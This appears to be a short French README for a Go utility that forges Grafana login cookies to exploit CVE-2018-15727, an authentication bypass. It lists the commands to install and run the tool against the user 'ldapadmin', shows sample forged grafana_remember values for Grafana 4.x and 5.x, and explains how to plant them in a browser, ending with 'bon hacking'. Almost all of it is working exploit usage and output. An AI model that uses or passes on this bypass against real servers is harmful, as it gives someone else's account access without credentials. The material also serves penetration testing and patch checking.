
un petit utilitaire pour générer un cookie afin d'exploiter une vulnérabilité Grafana (CVE-2018-15727)
$ go get github.com/u238/grafana-CVE-2018-15727
$ source <(go env)
$ $GOPATH/bin/grafana-CVE-2018-15727 ldapadmin
[i] supprimez le cookie grafana_sess de votre session navigateur
[i] définissez les cookies suivants dans votre navigateur :
* pour Grafana 5.x :
grafana_user : ldapadmin
grafana_remember : 8947f2c6b81963b2a45f4293ced63802f0c923daa368a9beda748800335fc72c06ea186e43
* pour Grafana 4.x :
grafana_user : ldapadmin
grafana_remember : 8d26614cd6a92aaf892eebb066ae17ed65ef6c9bea73f875ed6698a907d807db0026787fc3
[+] bon hacking ;)
Voir le fichier LICENCE.